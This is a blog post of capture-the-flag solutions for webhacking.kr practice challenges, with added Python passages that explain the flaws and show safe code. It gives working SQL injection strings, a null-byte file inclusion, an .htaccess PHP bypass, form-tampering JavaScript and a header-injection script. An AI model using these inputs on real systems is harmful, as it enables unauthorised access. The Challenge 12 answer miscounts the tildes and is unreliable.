
Webhacking Kr

Solutions

Posted by Heeraj on January 20, 2016


For the past week I was focusing on the webhacking kr challenges, so I thought I would share the solutions to the challenges that I was able to solve. The challenges were very, hats off to the team who worked behind it.

Webhacking Challenge 01

In the first challenge, you have to change the cookie value to a number between 5 and 6. In Chrome you can use editmycookie, or you could use Firebug or any other means.

Webhacking Challenge 03

It's just a game which is very similar to sudoku. The numbers give you the count of black boxes that are possible. After clearing it you will see an input box, and you may guess an SQL injection. You are probably right: it is a simple SQL injection, but here you have to use the pipe, which is the most difficult thing to figure out. Don't waste your time trying SQLi in the input box. Try with Burp Suite, where you can easily exploit it.

answer=1010100000011100101011111||1&id=kjkjkfd

Webhacking Challenge 04

The thing in front of you is something you will recognise: a base64 encoding. When you decode it you get a string 40 characters long. 40 is a big clue; if you have a hash identifier tool, you have probably got it by now. Yes, SHA-1. Now try to reverse it; you can use an online tool such as hashkiller. Again you will get a string 40 characters long. Reverse it again :)
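The layer identification described above, as an added Python example that is not part of the original post. The secret, the candidate list and all function names are constructed for illustration; the lookup only succeeds because unsalted SHA-1 of a guessable value can be precomputed.

```python
import base64
import binascii
import hashlib
import re

# Hex digest length -> likely hash function (the "40 is a big clue" step).
HEX_DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}

def peel(blob):
    """Base64-decode once and classify the result by hex-digest length."""
    try:
        raw = base64.b64decode(blob, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None, None
    if re.fullmatch(r"[0-9a-f]+", raw):
        return raw, HEX_DIGEST_LENGTHS.get(len(raw))
    return raw, None

def sha1_hex(text):
    return hashlib.sha1(text.encode()).hexdigest()

def reverse_double_sha1(digest, candidates):
    """Look the digest up in a table of sha1(sha1(word)) for known words."""
    table = {sha1_hex(sha1_hex(word)): word for word in candidates}
    return table.get(digest)

def build_sample(secret):
    """Constructed sample with the same layering: base64(sha1(sha1(secret)))."""
    return base64.b64encode(sha1_hex(sha1_hex(secret)).encode()).decode()

def solve(blob, candidates):
    digest, kind = peel(blob)
    if kind != "sha1":
        return None
    return reverse_double_sha1(digest, candidates)

if __name__ == "__main__":
    sample = build_sample("test")          # constructed secret
    print(peel(sample))                     # 40 hex characters, "sha1"
    print(solve(sample, ["admin", "guest", "test"]))
```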

Webhacking Challenge 05

In challenge 5 you have both the login and join options. When you click the join option, an alert box comes up saying "Access Denied". When you look at the source you can see a move(), and from there you can guess the location of the join page (webhacking.kr/challenge/web/web-05/mem/join.php). From there you will be able to get the source code, which may be difficult to understand. As told in the source code, create a cookie oldzoombie, and your URL should contain the required parameter mode. Then you can join, but logging in as admin wouldn't be possible as there would be one more admin. So you can use a username such as admin%20 and any pass you like.

Webhacking Challenge 06

The first part of the PHP code in index.phps gives you the encoded id and password. Get the 20 times encoded and filtered id and pass, then create a cookie.

Webhacking Challenge 07

This is another SQL injection. In this one most of the SQL statements are filtered: http://webhacking.kr/challenge/web/web-07/index.php?val=13)%0Aunion%0aselect%0a(5-3

Webhacking Challenge 08

import requests

url = "http://webhacking.kr/challenge/web/web-08/"
cookies = {'PHPSESSID': 'dontseeoverhere'}

# First request: send the crafted User-Agent string
s = requests.Session()
headers = {'user-agent': "admin','1234','admin'), ('admin"}
r = s.get(url, cookies=cookies, headers=headers)
print(r.text)

print("\nNext Request \n")
# Second request: send the plain User-Agent "admin"
s = requests.Session()
headers = {'user-agent': "admin"}
r = s.get(url, cookies=cookies, headers=headers)
print(r.text)
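Why the User-Agent value in the script above matters on the server side, as an added example that is not part of the original post or the challenge's code. The table, its columns and the query shape are assumptions; the same header is logged once with string concatenation and once with bound parameters.

```python
import sqlite3

# Constructed stand-in for the challenge's table and query; the real
# server-side code is not shown on this page (assumption).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (agent TEXT, ip TEXT, id TEXT)")
    return db

def log_visit_vulnerable(db, agent, ip):
    # The header is pasted into the statement, so its quotes become SQL syntax.
    db.execute(
        "INSERT INTO visits (agent, ip, id) VALUES ('%s', '%s', 'guest')"
        % (agent, ip)
    )

def log_visit_safe(db, agent, ip):
    # Bound parameters are always data, whatever characters they contain.
    db.execute(
        "INSERT INTO visits (agent, ip, id) VALUES (?, ?, 'guest')", (agent, ip)
    )

def rows(db):
    return db.execute("SELECT agent, ip, id FROM visits ORDER BY id").fetchall()

USER_AGENT = "admin','1234','admin'), ('admin"  # value from the script above
CLIENT_IP = "203.0.113.7"                        # constructed sample address

def compare():
    vuln, safe = make_db(), make_db()
    log_visit_vulnerable(vuln, USER_AGENT, CLIENT_IP)
    log_visit_safe(safe, USER_AGENT, CLIENT_IP)
    return rows(vuln), rows(safe)

if __name__ == "__main__":
    for label, result in zip(("vulnerable", "parameterized"), compare()):
        print(label, result)
```

With concatenation the single request stores two rows, one of them carrying the id admin; with bound parameters it stores one guest row whose agent column holds the whole header.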

Webhacking Challenge 10

It was a simple challenge: you have to go to ?go=800 and you will get it. document.write (" go ");

Webhacking Challenge 12


url : http://webhacking.kr/challenge/codeing/code3.html
Hint:(variable worktime)

var enco='';
var enco2=126;
var enco3=33;
// ck is everything in the URL from the first "=" onwards
var ck=document.URL.substr(document.URL.indexOf('='));
// enco alternates the characters with codes 1..121 with NUL characters,
// so enco_(2*k) returns k+1
for(i=1;i<122;i++)
{
    enco=enco+String.fromCharCode(i,0)
}
function enco_(x)
{
    return enco.charCodeAt(x);
}
if(ck=="="+String.fromCharCode(enco_(240))+String.fromCharCode(enco_(220))+String.fromCharCode(enco_(232))+String.fromCharCode(enco_(192))+String.fromCharCode(enco_(226))+String.fromCharCode(enco_(200))+String.fromCharCode(enco_(204))+String.fromCharCode(enco_(222-2))+String.fromCharCode(enco_(198))+"~~~~~~"+String.fromCharCode(enco2)+String.fromCharCode(enco3))
{
    alert("Password is "+ck.replace("=",""));
}

When we simplify the if statement we can see that ck should be equal to =youaregod~~~~~!
Pass: Password is youaregod~~~~~!

Webhacking Challenge 20

Read the page source carefully.
EXPLOIT CODE:
javascript:lv5frm.id.value="a";
javascript:lv5frm.cmt.value="a";
javascript:lv5frm.hack.value=lv5frm.attackme.value;
javascript:lv5frm.submit();

Run it 2-3 times repeatedly and you may solve the challenge.

Webhacking Challenge 25

Local file inclusion. %00 can be used for local file inclusion,
e.g. password.php%00
In the case of Windows you have to use ? or ;
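What the %00 does to a file name and the check that stops it, as an added Python example that is not part of the original post. The base directory, the appended .txt extension and the function names are assumptions made for illustration.

```python
import os
from urllib.parse import unquote

# Hypothetical directory holding the includable pages (an assumption).
BASE = os.path.realpath("/srv/app/pages")

def naive_target(param):
    """Include logic that appends an extension and validates nothing.

    The file API underneath treats the name as a C string, so everything
    after the first NUL byte (the appended extension included) is ignored.
    """
    requested = os.path.join(BASE, unquote(param) + ".txt")
    return requested.split("\x00", 1)[0]   # the name the OS actually opens

def safe_target(param):
    """Resolve the parameter to a file under BASE or raise ValueError."""
    name = unquote(param)
    if "\x00" in name:
        raise ValueError("NUL byte in file name")
    full = os.path.realpath(os.path.join(BASE, name + ".txt"))
    if os.path.commonpath([full, BASE]) != BASE:
        raise ValueError("path escapes the base directory")
    return full

def is_rejected(param):
    try:
        safe_target(param)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    for p in ("hello", "password.php%00", "..%2f..%2fetc%2fpasswd"):
        print(p, "->", naive_target(p), "| rejected:", is_rejected(p))
```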

Webhacking Challenge 28

In this challenge, you have to view the password, which can only be done if you have a .htaccess file. The content of the file is given below.

php_flag engine off
AddType text/plain php|

Webhacking Challenge 29

The only way to bypass is passing the lv as admin, which can be done because we have an insert option. So adding that is easily possible, but the problem is that the code can easily detect admin. So we have to use a reverse function. You have 2 input fields: in the first field you have to input the id, which can be anything, and the phone can also be anything. So the only important thing is to change it to make admin. The only way is to misuse the insert.

id: nimda
phone: 123,reverse(id)),(1,1

I will come back with the next part of the solutions within days.

Thank you for reading the blog!